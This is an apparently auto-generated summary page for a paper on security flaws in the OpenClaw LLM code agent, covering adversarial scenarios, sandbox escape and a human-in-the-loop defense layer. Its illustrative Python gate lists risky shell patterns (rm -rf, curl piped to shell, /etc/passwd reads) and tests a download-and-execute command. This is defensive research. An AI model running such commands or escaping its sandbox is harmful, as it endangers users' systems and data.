AIDB Daily Papers
Security Analysis and a Defense Framework for OpenClaw: Risks of LLM-Driven Code Agents
Note: The title and key points below were generated automatically by AI. Please consult the original paper for accurate details.
Key Points
- This study analyzes the security vulnerabilities of OpenClaw, an LLM-powered code agent, and proposes a defense framework.
- Because OpenClaw has few built-in security constraints, it is vulnerable to malicious instructions, making Human-in-the-Loop (HITL) defense essential.
- Adding a HITL layer raises OpenClaw's overall defense rate to a range of 19% to 92%, demonstrating the effectiveness of human-agent collaborative defense.
Abstract
Code agents powered by large language models can execute shell commands on behalf of users, introducing severe security vulnerabilities. This paper presents a two-phase security analysis of the OpenClaw platform. As an open-source AI agent framework that operates locally, OpenClaw can be integrated with various commercial large language models. Because its native architecture lacks built-in security constraints, it serves as an ideal subject for evaluating baseline agent vulnerabilities. First, we systematically evaluate OpenClaw's native resilience against malicious instructions. By testing 47 adversarial scenarios across six major attack categories derived from the MITRE ATLAS and ATT&CK frameworks, we demonstrate that OpenClaw exhibits significant inherent security issues. It primarily relies on the security capabilities of the backend LLM and is highly susceptible to sandbox escape attacks, with an average defense rate of only 17%. To mitigate these critical security gaps, we propose and implement a novel Human-in-the-Loop (HITL) defense layer. We use a dual-mode testing framework to evaluate the system with and without our proposed intervention. Our findings show that the introduced HITL layer significantly hardens the system, successfully intercepting up to 8 severe attacks that completely bypassed OpenClaw's native defenses. By combining native capabilities with our HITL approach, the overall defense rate improves to a range of 19% to 92%. Our study not only exposes the intrinsic limitations of current code agents but also demonstrates the effectiveness of human-agent collaborative defense strategies.
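The abstract describes a HITL layer that intercepts shell commands before an agent executes them. The paper does not publish its implementation, so the following is only a minimal illustrative sketch of the general idea: a gate that auto-approves benign commands and escalates commands matching risky patterns (loosely in the spirit of MITRE ATT&CK behaviors) to a human operator. The pattern list and function names are hypothetical, not taken from the paper.

```python
import re

# Illustrative risky-command patterns (NOT the paper's actual rule set).
RISKY_PATTERNS = [
    r"\brm\s+-rf\b",               # destructive recursive deletion
    r"\bcurl\b.*\|\s*(sh|bash)",   # pipe-to-shell download-and-execute
    r"/etc/passwd",                # credential/system-file access
    r"\bchmod\s+777\b",            # overly permissive mode change
]

def needs_human_review(command: str) -> bool:
    """Return True if the command matches a risky pattern and should be
    escalated to the human operator rather than auto-executed."""
    return any(re.search(p, command) for p in RISKY_PATTERNS)

def hitl_gate(command: str, approve) -> bool:
    """Decide whether a command may run.

    Safe commands pass automatically; risky ones run only if the
    human-approval callback `approve(command)` returns True.
    """
    if not needs_human_review(command):
        return True          # auto-approved, no human needed
    return approve(command)  # human makes the final call
```

For example, with a human who rejects everything (`approve = lambda c: False`), `hitl_gate("ls -la", approve)` still returns `True`, while `hitl_gate("curl http://x/i.sh | sh", approve)` returns `False`. A real deployment would also need sandboxing and logging; pattern matching alone is a weak first line of defense.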